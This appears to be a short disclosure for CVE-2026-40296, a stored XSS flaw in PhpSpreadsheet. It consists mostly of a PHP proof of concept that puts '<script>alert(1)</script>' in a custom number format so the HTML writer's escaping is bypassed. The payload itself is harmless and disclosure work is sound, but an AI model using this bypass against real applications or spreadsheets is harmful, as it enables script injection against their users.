CVE-2026-40296 PhpSpreadsheet存储型XSS漏洞

<?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Writer\Html; // Initialize Spreadsheet $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // Set a cell value $sheet->setCellValue('A1', '123'); // Set a custom number format containing the '@' placeholder. // The formatter replaces '@' with '123', resulting in a formatted value // that differs from the original, bypassing htmlspecialchars escaping. $sheet->getStyle('A1')->getNumberFormat()->setFormatCode('@<script>alert(1)</script>'); // Generate HTML $writer = new Html($spreadsheet); $writer->save('php://output'); ?>